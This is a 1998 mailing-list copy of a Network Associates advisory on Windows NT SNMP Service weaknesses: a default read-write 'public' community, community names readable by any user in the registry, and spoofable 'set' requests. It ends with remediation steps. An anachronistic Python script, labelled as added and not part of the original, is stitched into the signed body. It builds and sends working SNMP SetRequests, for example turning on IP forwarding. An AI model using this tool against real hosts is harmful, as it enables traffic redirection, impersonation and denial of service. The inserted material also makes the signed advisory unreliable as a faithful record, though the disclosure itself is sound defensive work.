From seclabs@NAI.COM Wed Nov 18 12:02:43 1998
From: Security Research Labs
To: BUGTRAQ@netspace.org
Date: Tue, 17 Nov 1998 12:45:35 -0800
Subject: NAI-30: Windows NT SNMP Vulnerabilities

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=======================================================================
Network Associates, Inc.
SECURITY ADVISORY #30
November 17, 1998

Windows NT SNMP Security Permissions
=======================================================================

SYNOPSIS

This advisory addresses a vulnerability in the common configuration of the Windows NT SNMP Service. The vulnerability allows individuals to remotely read and modify network parameters that are critical to the security and proper operation of the system.

=======================================================================

DETAILS

The SNMP Service implements the Simple Network Management Protocol in Windows NT and allows remote management of the system's network components. It is not installed as part of the normal Windows NT installation process; it is added through the Network control panel by selecting the Services tab, clicking the Add button and then selecting SNMP Service.

When the SNMP Service is installed, the default configuration leaves the system open to attack. In that configuration the service answers to a single SNMP community, "public", which is given read-write permissions. A community name functions much like an account name or a password: it restricts who can use the SNMP functions and in what capacity. SNMP provides two levels of access, read-only and read-write, but the Windows NT SNMP Service prior to Service Pack 4 cannot configure a community as read-only, so every configured community has the ability to write.
If the SNMP Service is reconfigured with a more secure community name, the system is still vulnerable to attack from users with an account on it. The SNMP Service parameters are stored in the registry and are readable by all users, so a user with an account on the system can read the list of configured community names and use one of them to access the SNMP Service. With write access to an SNMP community, that user can perform actions that are usually restricted to users with privileged access.

In addition to restricting access to a list of community names, the Windows NT SNMP Service has an option to restrict access to a list of IP addresses. Although this may seem to provide a way to limit exposure to attacks from unknown systems, it is not very effective. SNMP exchanges commands and their replies in UDP packets, and because UDP is connectionless, forging the source address of a command packet is trivial. An SNMP "set" operation in particular can be sent with any source address, since the attacker does not need the reply for the set to take effect. Restricting the set of addresses that can communicate with the SNMP service therefore does not prevent malicious "set" operations once the attacker knows which addresses are allowed. Like the community names, the list of permitted addresses is stored in the registry and is accessible to any user with an account on the system.

=======================================================================

AFFECTED SYSTEMS

All versions of Windows NT where the administrator has enabled the SNMP Service and not reconfigured its security parameters are vulnerable to attack from users who can reach the system over the network.

All versions of Windows NT where the administrator has enabled the SNMP Service are vulnerable to attack from users with accounts on the system.
These systems are vulnerable to attack from remote users if the administrator has not removed the "public" community from the SNMP Service configuration and replaced it with a hard-to-guess name.

=======================================================================

IMPACT

Remote individuals with network access to a machine running the Windows NT SNMP Service can query and set any of the system management variables it supports. Information that can be queried includes:

- the LAN Manager domain name
- a list of users
- a list of shares
- a list of running services
- a list of active TCP connections
- a list of active UDP connections
- a list of network interfaces and their associated IP and hardware addresses
- the IP routing table and the ARP table

as well as a number of networking performance statistics.

By setting variables, an attacker can modify the IP routing table and the ARP table, bring interfaces up and down, and change critical networking parameters such as the default IP time-to-live (TTL) and IP forwarding. These settings allow an attacker to redirect network traffic, impersonate other machines or deny the machine access to the network. The ability to modify the routing table and enable IP forwarding is especially dangerous if the NT host is a firewall with SNMP enabled.

=======================================================================

RESOLUTION

Service Pack 4 (SP4) addresses this problem by adding access control and allowing each community to be configured READ ONLY, READ WRITE or READ CREATE. Note that when Service Pack 4 is installed, communities default to READ CREATE, which still allows modification of SNMP entries and therefore does not by itself close this vulnerability. Ensure that communities are configured READ ONLY to prevent modification of SNMP entries.
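To make the distinction between a harmless "get" and the "set" that only a READ ONLY community refuses concrete, here is a minimal SNMPv1 (RFC 1157) message builder and header parser. This is an added example for this advisory, not code from NAI or Microsoft; it uses only the Python standard library. The two OIDs are the standard MIB-II ipForwarding and ipDefaultTTL objects the IMPACT section names; the PERMITS_SET table and agent_accepts() model the SP4 permission behaviour as the advisory describes it and are assumptions, not Microsoft's implementation. Nothing is transmitted unless send_set() is called explicitly, and it should only be pointed at a host you administer.

```python
"""Minimal SNMPv1 (RFC 1157) message builder/parser.

Added example for this advisory; not NAI's or Microsoft's code.  Standard
library only.  Nothing is transmitted unless send_set() is called.
"""
import socket

# BER/ASN.1 tags used by SNMPv1 messages.
INTEGER, OCTET_STRING, NULL, OID, SEQUENCE = 0x02, 0x04, 0x05, 0x06, 0x30
GET_REQUEST, SET_REQUEST = 0xA0, 0xA3
SNMP_V1 = 0

# MIB-II (RFC 1213) objects the advisory names as writable on NT.
IP_FORWARDING = "1.3.6.1.2.1.4.1.0"    # 1 = forwarding (acts as a gateway), 2 = not-forwarding
IP_DEFAULT_TTL = "1.3.6.1.2.1.4.2.0"

# SP4 permission names from the advisory.  Which of them admit a SetRequest is
# modelled from the advisory text (assumption, not Microsoft's code).
PERMITS_SET = {"READ ONLY": False, "READ WRITE": True, "READ CREATE": True}


def _tlv(tag, payload):
    """Encode one BER tag-length-value (short or long definite length)."""
    n = len(payload)
    if n < 0x80:
        length = bytes([n])
    else:
        lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(lb)]) + lb
    return bytes([tag]) + length + payload


def _int(value):
    """BER INTEGER: minimal two's-complement octets."""
    n = max(1, (value.bit_length() + 8) // 8)
    return _tlv(INTEGER, value.to_bytes(n, "big", signed=True))


def _oid(dotted):
    """BER OBJECT IDENTIFIER with base-128 sub-identifiers."""
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return _tlv(OID, bytes(out))


def build_message(pdu_type, community, bindings, request_id=1):
    """Return a complete SNMPv1 message.  bindings: [(oid, None | int | bytes)];
    None encodes as NULL, the placeholder value used in a GetRequest."""
    vbs = b""
    for oid, value in bindings:
        if value is None:
            enc = _tlv(NULL, b"")
        elif isinstance(value, int):
            enc = _int(value)
        else:
            enc = _tlv(OCTET_STRING, value)
        vbs += _tlv(SEQUENCE, _oid(oid) + enc)
    pdu = _tlv(pdu_type, _int(request_id) + _int(0) + _int(0) + _tlv(SEQUENCE, vbs))
    # The community is a cleartext OCTET STRING: it is the entire "password".
    return _tlv(SEQUENCE, _int(SNMP_V1) + _tlv(OCTET_STRING, community.encode()) + pdu)


def _read_tlv(buf, pos):
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                      # long-form length
        nb = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + nb], "big"), pos + nb
    return tag, buf[pos:pos + length], pos + length


def parse_header(msg):
    """Return (version, community, pdu_type) from a raw SNMPv1 message, i.e.
    exactly what a passive sniffer on the path learns from a single packet."""
    tag, body, _ = _read_tlv(msg, 0)
    if tag != SEQUENCE:
        raise ValueError("not an SNMP message")
    _, ver, pos = _read_tlv(body, 0)
    _, community, pos = _read_tlv(body, pos)
    pdu_tag, _, _ = _read_tlv(body, pos)
    return int.from_bytes(ver, "big", signed=True), community.decode(), pdu_tag


def agent_accepts(permission, pdu_type):
    """Model of the SP4 check: READ ONLY rejects a SetRequest; the SP4 default
    READ CREATE does not (assumption drawn from the advisory text)."""
    return pdu_type != SET_REQUEST or PERMITS_SET[permission]


def send_set(target, community, oid, value, timeout=2.0):
    """Send one SetRequest to UDP/161 and return the raw reply, or None.
    The set takes effect whether or not the reply reaches the sender, which is
    why a forged allowed source address (raw sockets, not shown) defeats an
    address list."""
    msg = build_message(SET_REQUEST, community, [(oid, value)])
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(msg, (target, 161))
        try:
            return s.recvfrom(65535)[0]
        except socket.timeout:
            return None


if __name__ == "__main__":
    # Constructed sample: the packet that turns on IP forwarding on an NT host
    # still answering to the default "public" community.
    pkt = build_message(SET_REQUEST, "public", [(IP_FORWARDING, 1)])
    print(pkt.hex())
    print(parse_header(pkt))
    for perm in PERMITS_SET:
        print(f"{perm:12} accepts this set: {agent_accepts(perm, SET_REQUEST)}")
```

Running the script prints the 41-byte SetRequest with the community "public" visible as plain ASCII in the hex dump, followed by the parsed header and the permission model showing that only READ ONLY refuses it. The parser is what a sniffer does, which is why changing the community alone is not enough when the management traffic crosses an untrusted segment.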
To configure the SNMP Service go to:

  "Control Panel" -> "Network" -> "Services" -> "SNMP Service"

From this window, select the "Security" tab. There the security setting of each community name can be configured. It is recommended that each community name be configured READ ONLY unless otherwise required.

The permissions on the SNMP registry key allow "Everyone" access by default, which lets any user of the system obtain the community names used by the SNMP Service. The Administrator should also tighten the permissions on this key so that only Administrator and other authorized users can read the contents of:

  Hive : HKEY_LOCAL_MACHINE
  Key  : System\CurrentControlSet\Services\SNMP\Parameters

On NT 5.0, the permissions on this key will be set securely by default.

Ensure that the community name is changed from the default "public" to a more obscure name.

Block SNMP access at your firewall or border router. SNMP uses UDP port 161 (and UDP port 162 for traps).

=======================================================================

CREDITS

Documentation and testing of this problem was conducted by Tim Newsham and Jeremy Rauch at the security labs of Network Associates.

=======================================================================

ABOUT THE NETWORK ASSOCIATES SECURITY LABS

The Security Labs at Network Associates hosts some of the most important research in computer security today. With over 29 security advisories published in the last 2 years, the Network Associates security auditing teams have been responsible for the discovery of many of the Internet's most serious security flaws. This advisory represents our ongoing commitment to provide critical information to the security community.

For more information about the Security Labs at Network Associates, see our website at http://www.nai.com or contact us at .
The Security Labs at Network Associates are a participating member of FIRST, the Forum of Incident Response and Security Teams. For more information about FIRST, see http://www.first.org.

=======================================================================

NETWORK ASSOCIATES SECURITY LABS PGP KEY

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGP 5.5.5

mQGiBDXGgDsRBADVOnID6BtEhKlm2cNalho28YP0JAh+J4iRUIaiWshzI0tc0KPc fvs+0xYwiqjxmeHi2sdIEPQ7S+ltA3Dlp6/DFojWBr2XB9hfWy4uiKBUHqnsKYnB Gpkh6nIx7DIwn+u0PXMXbJCG3LYf8daiPVdzC2VFtbRvJL4wZc6NLQViFQCg/9uS DuH/0NE6mO8Cu4iVrUT5Wk8D/ArOpV5T5yIuXHZO1/ZBVeHccVVvHe8wHK4D9WUs FsB8fgYLNgdFMMjtam7QQSBY/P1KKBzaFqZhkfS4WVMAFEy94NHXG+KTCPhXkZzp OPPqwWqZgfvOg0Bm20O/GhzQkB6JfFJqcfR87Ej0+fcDKrTTxAELWHGS7c9Qdn6P bfwHA/4oLNwYrtgWNkjGcG018Pu2jKT7YuP9zBTMu28IBiWdPLGL9Wle4d5cdDVx Es4iVl8FMtxlgTWCgMnBLS4nyM3pCn1HF+8Gi+IVKUXWCkqt/rtBMsrOMfrOgEIu BWnTZcTR7kcWtH7xDFNyZ47U4pElLXwATVDty/FczAJnpeht2LQyTmV0d29yayBB c3NvY2lhdGVzIFNlY3VyaXR5IExhYnMgPHNlY2xhYnNAbmFpLmNvbT6JAEsEEBEC AAsFAjXGgDsECwMCAQAKCRCheCy6j9WBEtgDAKDpYMwQZP0Ipx7X0ivnTxxJkA/W vACg4LZv0lmWqmnd7XCe4OIJ05aT6hK5Ag0ENcaAOxAIAPZCV7cIfwgXcqK61qlC 8wXo+VMROU+28W65Szgg2gGnVqMU6Y9AVfPQB8bLQ6mUrfdMZIZJ+AyDvWXpF9Sh 01D49Vlf3HZSTz09jdvOmeFXklnN/biudE/F/Ha8g8VHMGHOfMlm/xX5u/2RXscB qtNbno2gpXI61Brwv0YAWCvl9Ij9WE5J280gtJ3kkQc2azNsOA1FHQ98iLMcfFst jvbzySPAQ/ClWxiNjrtVjLhdONM0/XwXV0OjHRhs3jMhLLUq/zzhsSlAGBGNfISn CnLWhsQDGcgHKXrKlQzZlp+r0ApQmwJG0wg9ZqRdQZ+cfL2JSyIZJrqrol7DVeky CzsAAgIH/RZcJoRkhCf9O4Er+rciBNG3QqM3tek23oxGuVwqRxtGlGKuf+YaUDIA vZhARftupZYJf/+AM9pyjjsF7ON/Df5oIXXhqzrDySw47dNB3I1FG7vwAUBRfYgG NRP+zvf1nld+FgAXag1DIQteXYPtoMUJP8ZgvbELYVdZS2TapOHUv7r4rOY+UUjl U+FkQPp9KCNreaNux4NxwT3tzXl1KqqkliC8sYxvMCkJ+JO71TKGplO9dXsf3O8p 2r33+LngmLs4O7inrUlmAUKq3jmCK50J7RsZjd6PlK/0JwcjFkOZeYrxTguZzCR4 QYmo8nEHqEMSKQci0VUf9KH4lHf6xmGJAEYEGBECAAYFAjXGgDsACgkQoXgsuo/V gRK5LACgoAqLFk10kAMu6xb3ftO4+INJs14Ani+1hujlYRxYphN97c5ci8WtILNZ
=L3C6
- -----END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.0

iQA/AwUBNlFSeKF4LLqP1YESEQJz2wCfa/RZiCMpQxd/cT8moR4m3GnzGzIAoMPU
ybY9nPnqVfjX5Wxv2rf/yrx0
=3ksc
-----END PGP SIGNATURE-----